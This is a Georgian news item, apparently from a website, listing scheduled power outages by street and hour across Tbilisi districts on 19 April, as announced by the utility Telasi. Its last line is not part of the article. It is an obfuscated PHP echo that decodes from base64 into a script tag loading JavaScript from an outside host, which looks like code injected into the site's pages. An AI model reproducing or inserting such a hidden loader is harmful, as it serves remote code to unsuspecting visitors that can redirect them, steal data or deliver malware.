celsiusi
ავერსი საქკაბელი
სხვადასხვა სამუშაოს გამო, თბილისის რამდენიმე უბანს 19 აპრილს ელექტრომომარაგება დროებით შეიზღუდება.
 
„თელასის“ ინფორმაციით, საბურთალოს რაიონში, ქსელში გადართვების გამო, 00:00 საათიდან 03:00 საათამდე შეზღუდვა შეეხება: ყაზბეგის გამზირის (ნაწილობრივ), ვაჟა-ფშაველას გამზირის, ვაჟა-ფშაველას II, V, VI კვარტლების, ნუცუბიძის პლატოს I, III მიკრორაიონების, ბედიას, მინდელის, უნივერსიტეტის, პოლიტკოვსკაიას, შავგულიძის, სანდრო ეულის, თამარაშვილის, მაღალაშვილის, ჩხეიძის, გეგეჭკორის, ლორთქიფანიძის, ქუთათელაძის, გაბაშვილის, ქავთარაძის, მარიჯანის, ჩახავას, ნუცუბიძის, შატილის, ძოწენიძის, გამრეკელის, ინტენსიფიკაციის, ამაშუკელის, რამაზ ჩხიკვაძის, ჟღენტის და პიკასოს ქუჩების მოსახლეობას.
 
გეგმური სამუშაოების გამო, 10:00 საათიდან 17:00 საათამდე შეზღუდვა შეეხება: წყნეთის გზატკეცილის, ყაზბეგის გამზირის, ვაჟა-ფშაველას გამზირის, ვაჟა-ფშაველას VII კვარტლის, ქავთარაძის, მარიჯანის, გაბაშვილის, სანდრო ეულის და ანა პოლიტკოვსკაიას ქუჩების მოსახლეობას. გეგმური სამუშაოების გამო 10:00 საათიდან 16:00 საათამდე შეზღუდვა შეეხება: ავთანდილის და ვეფხისტყაოსნის ქუჩების მოსახლეობას.
 
ამასთან, ქსელში გადართვების გამო, 10:00 საათიდან 11:00 საათამდე შეზღუდვა შეეხება: ლისის ტბის მიმდებარე ტერიტორიის, ვაჟა-ფშაველას გამზირის, ვაჟა-ფშაველას II, VII კვარტლების, ჯურხა ნადირაძის, პეტრე ქავთარაძის, მარიჯანის და თავხელიძის ქუჩების მოსახლეობას.
 
ასევე, გეგმური სამუშაოების გამო, 11:00 საათიდან 14:00 საათამდე შეზღუდვა შეეხება: მეფე მირიანის, გოთას, შარტავას და ქვემო ვეძისის ქუჩების მოსახლეობას.
 
ვაკის რაიონში, გეგმური სამუშაოების გამო 10:00 საათიდან 17:00 საათამდე შეზღუდვა შეეხება ილია ჭავჭავაძის გამზირის მოსახლეობას. ნაძალადევის რაიონში, გეგმური სამუშაოების გამო, 10:00 საათიდან 18:00 საათამდე შეზღუდვა შეეხება: ცოტნე დადიანის, ხვინგიას, ცისარტყელას, ტრანსპორტის, კარალეთის, თორნიკე ერისთავის, მექანიზაციის, ნინუას, ბეჟანიშვილის, ჭყონდიდელის,ზესტაფონის, ფეიქართა და ქსნის ქუჩების მოსახლეობას. გეგმური სამუშაოების გამო 10:30 საათიდან 17:00 საათამდე შეზღუდვა შეეხება: გურამიშვილის გამზირის, თემქის დასახლების X კვარტლის, თემქის დასახლების XI მიკრორაიონის I კვარტლის, ჩარგლის, გუდამაყრის, თიანეთის და ბუაჩიძის ქუჩების მოსახლეობას.
 
ასევე, გეგმური სამუშაოების გამო 11:00 საათიდან 13:00 საათამდე შეზღუდვა შეეხება: ზღვისუბნის დასახლების X კვარტლის, ანაპის 414-ე დივიზიის და ურეკის ქუჩების მოსახლეობას.
 
დიდუბის რაიონში, გეგმური სამუშაოების გამო 10:00 საათიდან 18:00 საათამდე შეზღუდვა შეეხება მეტრო „დიდუბე“- ს მიმდებარე ტერიტორიის და წერეთლის გამზირის მოსახლეობას.
 
ჩუღურეთის რაიონში, გეგმური სამუშაოების გამო 10:00 საათიდან 18:00 საათამდე შეზღუდვა შეეხება: სოლომონ ქურდიანის და ცოტნე დადიანის ქუჩების მოსახლეობას.
 
კრწანისის რაიონში, გეგმური სამუშაოების გამო 10:00 საათიდან 16:00 საათამდე შეზღუდვა შეეხება გრიშაშვილის ქუჩის მოსახლეობას. გეგმური სამუშაოების გამო 11:00 საათიდან 13:00 საათამდე შეზღუდვა შეეხება: რუსთავის გზატკეცილის და სადგურის ქუჩის მოსახლეობას.
 
ასევე, კომპანია ბოდიშს უხდის მომხმარებლებს შექმნილი დისკომფორტის გამო. სამუშაოების დასრულების შემდეგ კი აბონენტებს ელექტრომომარაგება აღუდგება.
1437
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");